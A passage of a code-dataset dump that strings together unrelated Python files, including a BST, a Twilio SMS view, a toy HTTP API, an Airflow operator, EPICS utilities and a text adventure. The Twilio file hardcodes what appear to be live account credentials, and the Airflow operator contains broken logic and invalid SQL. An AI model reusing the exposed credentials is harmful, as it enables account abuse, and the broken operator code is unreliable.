{\n\t\"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information\n}\n","sub_path":"octoprint_telegram/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":31724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288812236","text":"from random import randrange\nfrom time import sleep\nn = int(input('I am thinking of a number between 0 and 5! \\nTry to guess which one it is: '))\nn2 = randrange(6) # randrange(6) draws 0..5 inclusive, matching the prompt; randrange(5) could never return 5\nprint('Processing...')\nsleep(2)\nif n == n2:\n print('Congratulations, you got it right')\nelse:\n print('Too bad, you got it wrong! The number was {}, try again'.format(n2))\n","sub_path":"ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356427918","text":"import random\n\n\nclass TreeNode:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.left = None\n self.right = None\n\n def __iter__(self):\n \"\"\" Return iterator that iterates through the elements in the BST\n below this node \"\"\"\n\n if self.left:\n for elt in self.left:\n yield elt\n\n yield (self.key, self.val)\n\n if self.right:\n for elt in self.right:\n yield elt\n\n def put(self, key, val):\n \"\"\" Add a new mapping between key and value in the tree \"\"\"\n if self.key == key:\n self.val = val\n elif self.key > key:\n if self.left:\n self.left.put(key, val)\n else:\n self.left = TreeNode(key, val)\n else:\n if self.right:\n self.right.put(key, val)\n else:\n self.right = TreeNode(key, val)\n\n def get(self, key):\n \"\"\" Get the value associated with the key \"\"\"\n if self.key == key:\n return self.val\n\n if self.key > key:\n if self.left:\n return self.left.get(key)\n else:\n return None\n else:\n if self.right:\n return self.right.get(key)\n else:\n return None\n\n def delete(self, key):\n \"\"\" Delete the node with the given key and return the\n root node of the tree \"\"\"\n\n if self.key == key:\n if self.right and self.left:\n [psucc, succ] = self.right._find_min(self)\n\n if psucc.left == succ:\n psucc.left = succ.right\n else:\n psucc.right = succ.right\n\n succ.left = self.left\n succ.right = self.right\n\n return succ\n\n else:\n if self.left:\n return self.left\n else:\n return self.right\n else:\n if self.key > key:\n if self.left:\n self.left = self.left.delete(key)\n\n else:\n if self.right:\n self.right = self.right.delete(key)\n\n return self\n\n def _find_min(self, parent):\n \"\"\" Return the minimum node in the current tree and its parent \"\"\"\n if self.left:\n return 
self.left._find_min(self)\n else:\n return [parent, self]\n\n\nclass BinarySearchTree:\n def __init__(self):\n \"\"\" Create an empty Binary Search Tree\"\"\"\n self.root = None\n\n def put(self, key, value):\n \"\"\" Add an object with a specific key to the BST \"\"\"\n if self.root:\n self.root.put(key, value)\n else:\n self.root = TreeNode(key, value)\n\n def get(self, key):\n \"\"\" Retrieve the object associated with the given key\"\"\"\n if self.root:\n return self.root.get(key)\n else:\n return None\n\n def has_key(self, key):\n \"\"\" Check whether BST has given key \"\"\"\n return self.get(key) is not None\n\n def delete(self, key):\n \"\"\" Remove object with given key from BST \"\"\"\n if self.root:\n self.root = self.root.delete(key)\n\n def __iter__(self):\n \"\"\" Returns an iterator for the binary search tree \"\"\"\n # iter(()) is an always-empty iterator; the previous EmptyIterator class only\n # defined next(), so it was neither iterable nor a valid Python 3 iterator\n if self.root:\n return iter(self.root)\n else:\n return iter(())\n\n\nif __name__ == '__main__':\n priority_queue = BinarySearchTree()\n\n for i in random.sample(range(1000), 10):\n priority_queue.put(-i, \"Task with Priority \" + str(i))\n\n for task in priority_queue:\n print(task)\n","sub_path":"data_and_algorithms/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640263154","text":"import os\nfrom twilio.rest import Client\nfrom django.http import HttpResponse\n\ndef run(request):\n account_sid = 'AC5bca5e1fe8572e4c10e0f66b6f63e9f8'\n auth_token = 'cb4fad176775963c18b8243709fa7625'\n\n client = Client(account_sid, auth_token)\n\n client.messages.create(\n to = '+14234830892',\n from_='+14232056663',\n body='Hi NAME. Will you be making it to your appointment on DATE? Respond Y/N.'\n )\n return HttpResponse('Sent text')\n","sub_path":"OCC_Twilio/texter/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423476819","text":"import re\nimport json\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nPORT = 8080\nHOST = '127.0.0.1'\n\n\nusers = {\n '234342': {\n 'id': 234342,\n 'created': '2016-09-10 11:20:42.143590',\n 'first_name': 'Peter',\n 'last_name': 'Griffen'\n },\n '234298': {\n 'id': 234298,\n 'created': '2016-05-10 20:18:29.451250',\n 'first_name': 'Homer',\n 'last_name': 'Simpson'\n }\n}\n\n\nclass UsersApi(BaseHTTPRequestHandler):\n\n def _list_users(self):\n return json.dumps(list(users.values()))\n\n def _get_user(self, id):\n user = users.get(id)\n if user:\n return json.dumps(user)\n\n def _with_response_code(self, code):\n # Send response status code\n self.send_response(code)\n\n # Send headers\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n def _write(self, data):\n self.wfile.write(bytes(data, \"utf8\"))\n\n def do_GET(self):\n if self.path == '/users':\n self._with_response_code(200)\n self._write(self._list_users())\n\n elif re.match('/users/[0-9]+$', self.path):\n id = self.path.split('/')[-1:][0] # Grab the last value\n user = self._get_user(id)\n if user:\n self._with_response_code(200)\n self._write(user)\n else:\n self._with_response_code(404)\n\n else:\n self._with_response_code(404)\n\n\nif __name__ == '__main__':\n server_address = (HOST, PORT)\n print('starting server on %s:%s...' 
% server_address)\n\n httpd = HTTPServer(server_address, UsersApi)\n httpd.serve_forever()\n","sub_path":"solution/server/step-3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"520847816","text":"import os\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import *\n\n\nclass TrainDataRetriever:\n\n labels = []\n\n def add_train_data(self, directory, label, img_type):\n for filename in os.listdir('./shapes/shapes/' + directory):\n current_image = Image.open('./shapes/shapes/' + directory + '/' + filename)\n current_image_as_array = np.array(current_image)\n rescaled_image_pixels = current_image_as_array / 255.0\n img_type.append(rescaled_image_pixels.tolist())\n self.labels.append(label)\n return np.array(img_type)\n","sub_path":"src/train_data_retriever.py","file_name":"train_data_retriever.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435775689","text":"\"\"\"empty message\n\nRevision ID: e30e85a186a4\nRevises: 7449bc72f5ba\nCreate Date: 2016-08-24 19:27:20.689021\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'e30e85a186a4'\ndown_revision = '7449bc72f5ba'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('author', 'is_author',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n op.alter_column('post', 'live',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('post', 'live',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n op.alter_column('author', 'is_author',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n ### end Alembic commands ###\n","sub_path":"migrations/versions/e30e85a186a4_.py","file_name":"e30e85a186a4_.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145922166","text":"from random import choice, random\n\n\nclass Spellbook:\n def __init__(self):\n # dmg, energy, turns\n self.avail_spells = {\"Shock\":(10,10,1),\"IceStorm\":(3,10,4),\"VolcanoBomb\":(50,60,1)}\n self.learned_spells = []\n spell = choice(list(self.avail_spells.keys()))\n self.learned_spells.append(spell)\n\n\ndef gen_jewelry(bonus):\n names1 = \"Gold\", \"Sapphire\", \"Silver\", \"Bronze\", \"Titanium\", \"Ruby\", \"Diamond\", \"Steel\"\n names2 = \"Ring\", \"Amulet\", \"Key\", \"Headband\"\n\n return choice(names1) + \" \" + choice(names2), 2 * bonus * (random() * 0.2 + 0.9)\n\n\nclass Adv_User:\n def __init__(self):\n self.name = \"Bob Saget\"\n\n self.health = 100\n self.energy = 15\n \n self.maxhealth = 100\n self.maxenergy = 15\n \n self.level = 1\n self.exp = 0\n self.exp_to_next = 0\n \n self.gold = 0\n self.inventory = []\n self.weapon = \"Dagger\", 5\n self.armor = \"Fur\", 1.4\n self.jewelry = gen_jewelry(1.2)\n\n self.spellbook = Spellbook()\n self.used_spell = None\n \n self.stats = {\"Strength\":10,\"Knowledge\":10}\n\n self.position = 22, 5\n\n self.can_do = \"Idling\", \"Fighting\", \"Socializing\", \"Examining\"\n self.doing = 0\n\n def level_up(self, point):\n self.stats[point] += 1\n self.exp = 0\n self.exp_to_next *= 2\n if point == \"Knowledge\":\n self.maxenergy += 5\n if point == \"Strength\":\n self.maxhealth += 10\n\n self.energy = self.maxenergy\n self.health = self.maxhealth\n \n\n\n def take_damage(self, source):\n dmg, kind = source\n if kind == \"magic\":\n res = self.jewelry[1]\n elif kind == \"physical\":\n res = self.armor[1]\n\n true = dmg - res \n return true\n\n def add_multis(self, source):\n dmg, kind = source\n if kind == \"magic\":\n multi = self.stats[\"Knowledge\"] * 0.5\n elif kind == \"physical\": # lowercase to match take_damage(); \"Physical\" never matched\n multi = self.stats[\"Strength\"] * 0.35\n\n true = dmg + multi\n return true\n\n def use_spell(self, name):\n if name not in self.spellbook.learned_spells: # learned_spells is a list of names, not a dict\n return \"not learned\"\n spell = self.spellbook.avail_spells[name] # the (dmg, energy, turns) tuple lives in avail_spells\n self.used_spell = spell\n\n\nclass Map:\n def __init__(self):\n self.legend = {\n \"$\":\"General Store\",\n \"#\":\"Library\",\n \"U\":\"Tavern\",\n \"5\":\"Blacksmith\",\n \"X\":\"Town\",\n \"Y\":\"Woods\",\n \"D\":\"Cave\",\n \"=\":\"River\",\n \"O\":\"Lake\",\n \"Q\":\"Waterfall\",\n \"+\":\"Crossroads\",\n \"-\":\"Road\",\n \"&\":\"Swamp\",\n \".\":\"Grass\",\n \"/\":\"Bridge\",\n \"h\":\"House\",\n \"M\":\"Mountain\"\n }\n\n\n def out_of_bounds(self, p):\n m = self.game_map\n x, y = p\n mx, my = len(m[0]), len(m)\n if not 0 <= x < mx:\n return True\n if not 0 <= y < my:\n return True\n return False\n\n def load_map(self, name):\n with open(name, \"r\") as f:\n lines = f.readlines()\n\n self.game_map = []\n maxx, maxy = len(lines[0])-1, len(lines)\n for y in range(maxy):\n self.game_map.append([])\n for x in range(maxx):\n tile = lines[y][x]\n self.game_map[y].append(tile)\n\n\ndef get_general_report(char, mapobj):\n game_map = mapobj.game_map\n l = mapobj.legend\n x, y = 
char.position\n d = {\n \"health\":char.health,\n \"energy\":char.energy,\n \"at\":l[game_map[y][x]],\n \"doing\":char.can_do[char.doing]\n }\n try: d[\"top\"] = l[game_map[y-1][x]]\n except IndexError: d[\"top\"] = \"Unavailible.\"\n try: d[\"right\"] = l[game_map[y][x+1]]\n except IndexError: d[\"right\"] = \"Unavailible.\"\n try: d[\"bottom\"] = l[game_map[y+1][x]]\n except IndexError: d[\"bottom\"] = \"Unavailible.\"\n try: d[\"left\"] = l[game_map[y][x-1]]\n except IndexError: d[\"left\"] = \"Unavailible.\"\n text = \"You have {health} health and {energy} energy. \\\nIn order top, right, bottom, left are {top}, {right}, {bottom}, {left}. \\\nYou are at {at}. You're currently {doing}.\".format(health=d[\"health\"],energy=d[\"energy\"],\\\n at=d[\"at\"],doing=d[\"doing\"],top=d[\"top\"],\\\n bottom=d[\"bottom\"],right=d[\"right\"],left=d[\"left\"])\n return text\n\ndef copylist(l):\n n = []\n for i in l:\n if isinstance(i, list):\n n.append(copylist(i))\n else:\n n.append(i)\n return n\n\ndef dpaste_this(content):\n print(content)\n\ndef link_map(char, mapobj):\n x, y = char.position\n copied = copylist(mapobj.game_map)\n copied[y][x] = \"Z\"\n content = \"\\n\".join(\"\".join(y) for y in copied)\n link = dpaste_this(content)\n return \"You are Z. {0}\".format(link)\n\n\nclass Adventure:\n def __init__(self):\n self.users = {}\n\n self.game_map = Map()\n self.game_map.load_map(\"map01.advmap\")\n\n def action(self, user, c):\n if user in self.users.keys():\n char = self.users[user]\n\n if c.rest[0] == \"report\":\n if c.rest[1] == \"general\":\n return get_general_report(char, self.game_map)\n elif c.rest[1] == \"map\":\n return link_map(char, self.game_map)\n\n elif c.rest[0] == \"move\":\n if char.doing == 0:\n move_dict = {\"up\":(0,-1),\"down\":(0,1),\"left\":(-1,0),\"right\":(1,0)}\n dx, dy = move_dict[c.rest[1]]\n new_pos = char.position[0] + dx, char.position[1] + dy\n if not self.game_map.out_of_bounds(new_pos):\n char.position = new_pos\n return \"Moved \" + c.rest[1] + \".\"\n else:\n return \"Unable to move there.\"\n else:\n return \"You are busy.\"\n\n elif c.rest[0] == \"social\":\n pass\n \n else:\n if c.rest[0] == \"create\":\n new_adv_acc = Adv_User()\n new_adv_acc.name = c.rest[1]\n self.users[user] = new_adv_acc\n return \"Account with name {name} created!\".format(name=c.rest[1])\n\nclass SComm:\n rest = []\n\nadv = Adventure()\nwhile True:\n s = \" \".join(input(\">\").split(\" \")[1:])\n comms = SComm()\n comms.rest = s.split(\" \")\n try: print(adv.action(\"vegard1992\", comms))\n except Exception as e: print(e)\n\n\n# implement better equipment / inventory system?\n# implement trading\n# implement fighting\n# implement examining\n# finish off \"report\" command\n","sub_path":"testing_adv.py","file_name":"testing_adv.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"404824448","text":"# vi: ts=4 sw=4 sts=4 expandtab\nfrom enum import IntEnum\nimport time as ttime\nimport ctypes\nimport threading\nimport queue\nimport logging\nimport warnings\nimport functools\nimport numpy as np\n\nimport epics\n\nfrom .errors import DisconnectedError, OpException\n\n__all__ = ['split_record_field',\n 'strip_field',\n 'record_field',\n 'MonitorDispatcher',\n 'get_pv_form',\n 'set_and_wait',\n 'AlarmStatus',\n 'AlarmSeverity',\n ]\n\nlogger = logging.getLogger(__name__)\n\n\nclass BadPVName(ValueError, OpException):\n ...\n\n\nclass AlarmSeverity(IntEnum):\n NO_ALARM = 0\n MINOR = 
1\n MAJOR = 2\n INVALID = 3\n\n\nclass AlarmStatus(IntEnum):\n NO_ALARM = 0\n READ = 1\n WRITE = 2\n HIHI = 3\n HIGH = 4\n LOLO = 5\n LOW = 6\n STATE = 7\n COS = 8\n COMM = 9\n TIMEOUT = 10\n HWLIMIT = 11\n CALC = 12\n SCAN = 13\n LINK = 14\n SOFT = 15\n BAD_SUB = 16\n UDF = 17\n DISABLE = 18\n SIMM = 19\n READ_ACCESS = 20\n WRITE_ACCESS = 21\n\n\ndef validate_pv_name(pv):\n '''Validates that there is not more than 1 '.' in pv\n\n Parameters\n ----------\n pv : str\n The pv to check\n\n Raises\n ------\n BadPVName\n '''\n if pv.count('.') > 1:\n raise BadPVName(pv)\n\n\ndef split_record_field(pv):\n '''Splits a pv into (record, field)\n\n Parameters\n ----------\n pv : str\n the pv to split\n\n Returns\n -------\n record : str\n field : str\n '''\n if '.' in pv:\n record, field = pv.rsplit('.', 1)\n else:\n record, field = pv, ''\n\n return record, field\n\n\ndef strip_field(pv):\n '''Strip off the field from a record'''\n return split_record_field(pv)[0]\n\n\ndef record_field(record, field):\n '''Given a record and a field, combine them into\n a pv of the form: record.FIELD\n '''\n record = strip_field(record)\n return '%s.%s' % (record, field.upper())\n\n\nclass MonitorDispatcher(epics.ca.CAThread):\n '''A monitor dispatcher which works with pyepics\n\n The monitor dispatcher works around having callbacks from libca threads.\n Using epics CA calls (caget, caput, etc.) from those callbacks is not\n possible without this dispatcher workaround.\n\n .. note::\n\n Without `all_contexts` set, only the callbacks that are run with\n the same context as the main thread are affected.\n\n .. note::\n\n Ensure that you call epics.ca.use_initial_context() at startup in\n the main thread\n\n Parameters\n ----------\n all_contexts : bool, optional\n re-route _all_ callbacks from _any_ context to the dispatcher callback\n thread\n timeout : float, optional\n callback_logger : logging.Logger, optional\n A logger to notify about failed callbacks\n\n Attributes\n ----------\n main_context : ctypes long\n The main CA context\n callback_logger : logging.Logger\n A logger to notify about failed callbacks\n queue : Queue\n The event queue\n '''\n\n def __init__(self, all_contexts=False, timeout=0.1,\n callback_logger=None):\n epics.ca.CAThread.__init__(self, name='monitor_dispatcher')\n\n self.daemon = True\n self.queue = queue.Queue()\n\n # The dispatcher thread will stop if this event is set\n self._stop_event = threading.Event()\n self.main_context = epics.ca.current_context()\n self.callback_logger = callback_logger\n\n self._all_contexts = bool(all_contexts)\n self._timeout = timeout\n\n self.start()\n\n def run(self):\n '''The dispatcher itself'''\n self._setup_pyepics(True)\n\n while not self._stop_event.is_set():\n try:\n callback, args, kwargs = self.queue.get(True, self._timeout)\n except queue.Empty:\n pass\n else:\n try:\n callback(*args, **kwargs)\n except Exception as ex:\n if self.callback_logger is not None:\n self.callback_logger.error(ex, exc_info=ex)\n\n self._setup_pyepics(False)\n epics.ca.detach_context()\n\n def stop(self):\n '''Stop the dispatcher thread and re-enable normal callbacks'''\n self._stop_event.set()\n\n def _setup_pyepics(self, enable):\n # Re-route monitor events to our new handler\n if enable:\n fcn = self._monitor_event\n else:\n fcn = epics.ca._onMonitorEvent\n\n epics.ca._CB_EVENT = ctypes.CFUNCTYPE(None, epics.dbr.event_handler_args)(fcn)\n\n def _monitor_event(self, args):\n if self._all_contexts or self.main_context == epics.ca.current_context():\n if 
callable(args.usr):\n if not hasattr(args.usr, '_disp_tag') or args.usr._disp_tag is not self:\n args.usr = lambda orig_cb=args.usr, **kwargs: \\\n self.queue.put((orig_cb, [], kwargs))\n args.usr._disp_tag = self\n\n return epics.ca._onMonitorEvent(args)\n\n\ndef waveform_to_string(value, type_=str, delim=''):\n '''Convert a waveform that represents a string into an actual Python string\n\n Parameters\n ----------\n value\n The value to convert\n type_ : type, optional\n Python type to convert to\n delim : str, optional\n delimiter to use when joining string\n '''\n try:\n value = delim.join(chr(c) for c in value)\n except TypeError:\n value = type_(value)\n\n try:\n value = value[:value.index('\\0')]\n except (IndexError, ValueError):\n pass\n\n return value\n\n\ndef get_pv_form():\n '''Get the PV form that should be used for pyepics\n\n Due to a bug in certain versions of PyEpics, form='time' cannot be used\n with some large arrays.\n\n native: gives time.time() timestamps from this machine\n time: gives timestamps from the PVs themselves\n\n Returns\n -------\n {'native', 'time'}\n '''\n def _fix_git_versioning(in_str):\n return in_str.replace('-g', '+g')\n\n def _naive_parse_version(version):\n try:\n version = version.lower()\n\n # Strip off the release-candidate version number (best-effort)\n if 'rc' in version:\n version = version[:version.index('rc')]\n\n version_tuple = tuple(int(v) for v in version.split('.'))\n except:\n return None\n\n return version_tuple\n\n try:\n from pkg_resources import parse_version\n except ImportError:\n parse_version = _naive_parse_version\n\n version = parse_version(_fix_git_versioning(epics.__version__))\n\n if version is None:\n warnings.warn('Unrecognized PyEpics version; using local timestamps',\n ImportWarning)\n return 'native'\n\n elif version <= parse_version('3.2.3'):\n warnings.warn('PyEpics versions <= 3.2.3 will use local timestamps (version: %s)' %\n epics.__version__,\n ImportWarning)\n return 'native'\n else:\n return 'time'\n\n\npv_form = get_pv_form()\n\n\ndef records_from_db(fn):\n '''Naively parse db/template files looking for record names\n\n Returns\n -------\n records : list\n [(record type, record name), ...]\n '''\n\n ret = []\n for line in open(fn, 'rt').readlines():\n line = line.strip()\n\n if line.startswith('#'):\n continue\n\n if not (line.startswith('record') or line.startswith('grecord')):\n continue\n\n if '(' not in line:\n continue\n\n line = line[line.index('(') + 1:]\n if ',' not in line:\n continue\n\n rtype, record = line.split(',', 1)\n rtype = rtype.strip()\n record = record.strip()\n\n if record.startswith('\"'):\n # Surrounded by quotes, easy to parse\n record = record[1:]\n record = record[:record.index('\"')]\n else:\n # No quotes, and macros may contain parentheses\n # Find the first non-matching parenthesis and\n # that should denote the end of the record name\n #\n # $(P)$(R)Record)\n # ^\n\n in_paren = 0\n for i, c in enumerate(record):\n if c == '(':\n in_paren += 1\n elif c == ')':\n in_paren -= 1\n\n if in_paren < 0:\n record = record[:i]\n break\n\n ret.append((rtype, record))\n\n return ret\n\n\ndef raise_if_disconnected(fcn):\n '''Decorator to catch attempted access to disconnected EPICS channels.'''\n @functools.wraps(fcn)\n def wrapper(self, *args, **kwargs):\n if self.connected:\n return fcn(self, *args, **kwargs)\n else:\n raise DisconnectedError('{} is not connected'.format(self.name))\n return wrapper\n\n\ndef set_and_wait(signal, val, poll_time=0.01, timeout=10, rtol=None,\n atol=None):\n 
\"\"\"Set a signal to a value and wait until it reads correctly.\n\n For floating point values, it is strongly recommended to set a tolerance.\n If tolerances are unset, the values will be compared exactly.\n\n Parameters\n ----------\n signal : EpicsSignal (or any object with `get` and `put`)\n val : object\n value to set signal to\n poll_time : float, optional\n how soon to check whether the value has been successfully set\n timeout : float, optional\n maximum time to wait for value to be successfully set\n rtol : float, optional\n allowed absolute tolerance between the readback and setpoint values\n atol : float, optional\n allowed relative tolerance between the readback and setpoint values\n\n Raises\n ------\n TimeoutError if timeout is exceeded\n \"\"\"\n if atol is None and hasattr(signal, 'tolerance'):\n atol = signal.tolerance\n if rtol is None and hasattr(signal, 'rtolerance'):\n rtol = signal.rtolerance\n\n signal.put(val)\n expiration_time = ttime.time() + timeout if timeout is not None else None\n current_value = signal.get()\n try:\n es = signal.enum_strs\n except AttributeError:\n es = ()\n\n if atol is not None:\n within_str = ['within {!r}'.format(atol)]\n else:\n within_str = []\n\n if rtol is not None:\n within_str.append('(relative tolerance of {!r})'.format(rtol))\n\n if within_str:\n within_str = ' '.join([''] + within_str)\n else:\n within_str = ''\n\n while not _compare_maybe_enum(val, current_value, es, atol, rtol):\n logger.info(\"Waiting for %s to be set from %r to %r%s...\",\n signal.name, current_value, val, within_str)\n ttime.sleep(poll_time)\n if poll_time < 0.1:\n poll_time *= 2 # logarithmic back-off\n current_value = signal.get()\n if expiration_time is not None and ttime.time() > expiration_time:\n raise TimeoutError(\"Attempted to set %r to value %r and timed \"\n \"out after %r seconds. 
Current value is %r.\" %\n (signal, val, timeout, current_value))\n\n\ndef _compare_maybe_enum(a, b, enums, atol, rtol):\n if enums:\n # convert enum values to strings if necessary first:\n if not isinstance(a, str):\n a = enums[a]\n if not isinstance(b, str):\n b = enums[b]\n # then compare the strings\n return a == b\n\n # if either relative/absolute tolerance is used, use numpy\n # to compare:\n if atol is not None or rtol is not None:\n return np.allclose(a, b,\n rtol=rtol if rtol is not None else 1e-5,\n atol=atol if atol is not None else 1e-8,\n )\n return a == b\n\n\n_type_map = {'number': (float, ),\n 'array': (np.ndarray, ),\n 'string': (str, ),\n 'integer': (int, ),\n }\n\n\ndef data_type(val):\n '''Determine data-type of val.\n\n Returns\n -------\n str\n One of ('number', 'array', 'string', 'integer'), else raises ValueError\n '''\n for json_type, py_types in _type_map.items():\n if type(val) in py_types:\n return json_type\n # no legit type found...\n raise ValueError('{} not a valid type (int, float, ndarray, str)'.format(val))\n\n\ndef data_shape(val):\n '''Determine data-shape (dimensions)\n\n Returns\n -------\n list\n Empty list if val is number or string, otherwise\n ``list(np.ndarray.shape)``\n '''\n for json_type, py_types in _type_map.items():\n if type(val) in py_types:\n if json_type == 'array':\n return list(val.shape)\n else:\n return list()\n raise ValueError('Cannot determine shape of {}'.format(val))\n","sub_path":"ophyd/utils/epics_pvs.py","file_name":"epics_pvs.py","file_ext":"py","file_size_in_byte":12850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"62259237","text":"from django.core.management.base import BaseCommand\nfrom apps.review.models import MajorBestReview, HumanityBestReview, Review\nfrom datetime import timedelta\nfrom django.utils import timezone\nimport random\n\n\nclass Command(BaseCommand):\n help = \"BestReview Changer\"\n\n def handle(self, *args, **options):\n print(\"BestReview changing start!\")\n latest_date_end = timezone.now()\n latest_date_start = timezone.now() - timedelta(days=7)\n\n def get_key(r):\n base_year = timezone.now().year\n lecture_year = r.lecture.year\n year_diff = base_year - lecture_year if (base_year > lecture_year) else 0\n return int(r.like / float(r.lecture.audience + 1) * (0.85 ** year_diff))\n\n def get_best_reviews(reviews, min_liked_count, max_result_count):\n liked_count = max(min_liked_count, len(reviews) // 10)\n most_liked_reviews = sorted(list(reviews), key=get_key, reverse=True)[:liked_count]\n\n latest_reviews = list(reviews.filter(written_datetime__range=(latest_date_start, latest_date_end)))\n\n best_candidate_reviews = most_liked_reviews + latest_reviews\n if len(best_candidate_reviews) > max_result_count:\n result_reviews = random.sample(best_candidate_reviews, k=max_result_count)\n else:\n result_reviews = best_candidate_reviews\n\n return result_reviews\n\n humanity_reviews = Review.objects.filter(course__department__code=\"HSS\")\n\n humanity_best_reviews = get_best_reviews(humanity_reviews, 50, 20)\n\n HumanityBestReview.objects.all().delete()\n for r in humanity_best_reviews:\n HumanityBestReview.objects.create(review=r)\n\n major_reviews = Review.objects.exclude(course__department__code=\"HSS\")\n\n major_best_reviews = get_best_reviews(major_reviews, 2000, 1000)\n\n MajorBestReview.objects.all().delete()\n for r in major_best_reviews:\n MajorBestReview.objects.create(review=r)\n\n print(\"BestReview was 
changed\")\n","sub_path":"apps/review/management/commands/update-best-reviews.py","file_name":"update-best-reviews.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181149013","text":"import json\nimport os\n\n\nclass StudentManager:\n #The actual path of the file we want to manage\n def __init__(self, filePath=''):\n self.filePath = filePath\n \n def getAllStudents(self):\n self.students = []\n try:\n with open(self.filePath, 'r') as file:\n self.students = json.load(file)\n return self.students\n except: return None\n\n def getAllNotes(self, folderName):\n myStd = self.getAllStudents()\n for folder in myStd:\n if folder[\"name\"]==folderName:\n return folder[\"notes\"]\n \n def addStudent(self, student):\n #Gets the info of the Student as a dict (we can change the name if it's confusing because it's a dict actually)\n self.data = student\n newData = []\n #dumps the data into JSON file\n try:\n if os.stat(self.filePath).st_size > 0:\n with open(self.filePath, 'r') as f: #reads actual students on json file\n newData=json.load(f)\n newData.append(self.data) #appends new student\n else: newData = [self.data]\n with open(self.filePath, 'w', newline='\\n') as f: #overwrites json file with new student, this keeps the json format\n json.dump(newData, f, indent=4)\n except: return 'ERROR' #If nothing gets returned, the process was a success, otherwise return something\n \n \n","sub_path":"Online/Noten/Cruz_Elian_Practica_12_StudentManager.py","file_name":"Cruz_Elian_Practica_12_StudentManager.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399068199","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadDimensionOperator(BaseOperator):\n\n ui_color = '#80BD9E'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id = \"\",\n create_sql_stmt = \"\",\n replace = True,\n table = \"\",\n *args, **kwargs):\n\n super(LoadDimensionOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.create_sql_stmt = create_sql_stmt\n self.table = table\n self.replace = replace\n\n def execute(self, context):\n redshift_conn = PostgresHook(postgres_conn_id = self.redshift_conn_id)\n\n if replace:\n redshift_conn.run(f\"DELETE * FROM {self.table}\")\n self.log.info(f\"Existing {self.table} table deleted ready for replace operation\")\n\n redshift_conn.run(self.create_sql_stmt)\n self.log.info(f\"{self.table} successfully loaded in {self.apprend_or_replace} operation\")\n","sub_path":"plugins/operators/load_dimension.py","file_name":"load_dimension.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213097132","text":"class Element:\n indentation = \" \"\n tag = \"\"\n\n def __init__(self, content=None, **kwargs):\n self.kwargs = kwargs\n if content is None:\n self.content = []\n else:\n self.content = [content]\n\n\n def append(self, string):\n self.content.append(string)\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(' {}=\"{}\"'.format(i,j))\n fileout.write(\">\\n\")\n #\n for obj in self.content:\n if isinstance(obj, Element):\n obj.render(fileout, cur_ind + 
